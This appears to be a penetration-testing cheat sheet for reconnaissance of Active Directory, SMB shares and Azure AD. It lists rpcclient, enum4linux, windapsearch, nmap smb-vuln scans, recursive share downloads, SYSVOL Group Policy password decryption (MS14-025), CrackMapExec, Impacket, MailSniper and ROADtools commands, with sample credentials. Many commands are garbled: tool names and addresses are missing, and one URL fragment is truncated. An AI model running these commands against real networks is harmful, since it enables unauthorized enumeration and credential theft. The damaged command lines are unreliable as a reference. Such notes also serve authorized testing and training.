Domain Recon


# Enumerate sessions
net session \\computer

Domain Properties


# You can use rpc to enumerate domain objects
rpcclient -U <user> <IP-DC>

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> srvinfo
rpcclient $> querygroup 0x42
rpcclient $> queryuser 0x42
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo 0x42


# You can use enum4linux to enumerate domain users
# You can try anonymous binding
sudo enum4linux
./ -R 1090-1200

# When using authenticated users, you need to provide options for enumeration
$ enum4linux -a -u "DOMAIN\\user" -p "pass" xx.xx.xx.xx
# enum4linux-ng is a rewrite of the official tool (python3)
# adding some features like colors and parsing


# windapsearch is also a very good tool to perform automated LDAP queries
# Enumerate users
./ -d -u ropnop\\ldapbind -p GoCubs16 -U
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 -U

# enumerate all entries in objectCategory=group
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 -G

# Query group membership
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 -m <CN/OU>

# Enumerate all domain admins and people having equivalent rights
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 --da

# Enumerate all computers
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 -C

# Custom search
./ -dc-ip -u ropnop\\ldapbind -p GoCubs16 -s <stringToSearch>


python get-netuser -w GALACTIC.LAN -u d.traya --dc-ip --username d.traya 
python get-netgroup -w GALACTIC.LAN -u d.traya --dc-ip --username d.vador

Built-in functions

# You can use [adsisearcher] to enumerate AD objects
PS> ([adsisearcher])"(&(objectcategory=useer)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findAll()

SMB & Share

Basic enumeration

# Enumerate hostname
nmblookup -A <victim_ip>
enum4linux -n <victim_ip>
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>

# Check for null sessions
smbmap -H <victim_ip>

# Checking for vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>


# Using smbclient
smbclient -L <IP>
smbclient -U GALACTIC.LAN\\d.vador -L //

# You can recursively download a folder
smb: > recurse ON
smb: > prompt OFF
smb: > mget *

SYSVOL & MS14-025

# You can browse SMB share using smbclient
# The SYSVOL share contains GPO, you can look for a MS14-025
smbclient -U user //

# Instead of remotely connecting to SYSVOL and manually search
# You can mount it locally and grep for informations
sudo mount -t cifs -o username=domainUser, //IP/SYSVOL
# MS14-025
→ smb: \NORZH.LAN\Policies\{195471B6-B0C6-4AD2-9853-28E2B4E9CEF6}\Machine\Preferences\Groups\Groups.xml
→ gpp-decrypt password

# The following tool allows a great decryption
# If you ever need to recreate this vulnerability
# You can encrypt a password using the following'option':'Hex','string':'4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D)To_Base64('A-Za-z0-9%2B/%3D')&input=cGFzcw

CrackMapExec & Impacket

# Impacket SMB/MSRPC tools
# lookupsids → SID Bruteforce through MSRPC Interface
# samrdump → SAM Remote Interface (MSRPC) to extract system users, available share etc.
# services → Used to (start, stop, delete, status, config, list, create, change) services through MSRPC interface
# netview → Get a list of opened sessions and keep tracks of who logged in/off from remote targets
# smbclient → generic SMB client
# rpcdump → This script will dump the list of RPC endpoints and string bindings registered at the target.
# reg → Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. domain\user:password@IP <command/parameter>

# You can list all shares on a shares on a machine to find potential entry points
cme smb -u user -p password --shares


# You can list active SMB sessions
C:\> net session
# And kill them
C:\> net session \[LinuxIPaddr] /del

Azure AD Recon

# Applications using Azure API Management
# Requests made to that

# Documentation and more

# Gateway

# Dev

# Management

# Git

# Tool o365recon can be used (
# It mainly uses MS Online Powershell module

PS> Connect-MsolService
PS> powershell -ep bypass .\o365recon.ps1 -outputfile TEST_OUTPUT

# The -users_detailed flag can be used in order to query more information about users
# LastDirSyncTime empty == User only exist in the cloud

# The id suffixed to the SYNC cloud account == same id for the MSOL account belonging to the on-premises Active Directory

# You can also list Azure AD roles and members (cf attached link)

# MailSniper can also be used to get the Adress List
PS C:\> Get-GlobalAddressList -ExchHostname -UserName xxxx -Password xxxx -OutFile xxxx

# And associated usernames
PS C:\> Get-ADUsernameFromEWS -EmailList list.txt -ExchHostname -Remote
# C# Module for Azure AD enumeration
# When having admin privileges you can check for MFA for users
PS C:\> Connect-MsolService
PS C:\> Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_. StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
# ROADTools (*
# It uses an internal undocumented version of Microsoft Graph API

PS C:\> roadrecon.exe auth -u user@domain
Tokens were written to .roadtools_auth

PS C:\> roadrecon.exe dump

PS C:\> roadrecon-gui.exe -debug -d .\roadrecon.db
 * Serving Flask app "roadtools.roadrecon.server" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on (Press CTRL+C to quit)

# Plugin for getting Conditional Access Policies
PS C:\> roadrecon plugin policies